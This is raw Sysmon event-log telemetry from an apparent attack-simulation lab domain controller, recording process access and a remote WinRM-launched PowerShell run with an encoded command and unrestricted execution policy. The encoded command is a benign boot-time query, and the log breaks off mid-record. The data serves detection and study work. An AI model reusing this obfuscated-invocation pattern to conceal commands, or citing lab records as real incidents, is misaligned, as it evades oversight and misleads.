1 10341000x8000000000000000477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.013{59A5CD1D-8E21-6005-D402-00000000A201}12844668C:\Windows\system32\cmd.exe{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.015{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E21-6005-D402-00000000A201}1284C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E21-6005-D402-00000000A201}1284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E21-6005-D402-00000000A201}1284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.997{59A5CD1D-8E20-6005-D202-00000000A201}2340740C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E21-6005-D402-00000000A201}1284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.009{59A5CD1D-8E21-6005-D402-00000000A201}1284C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 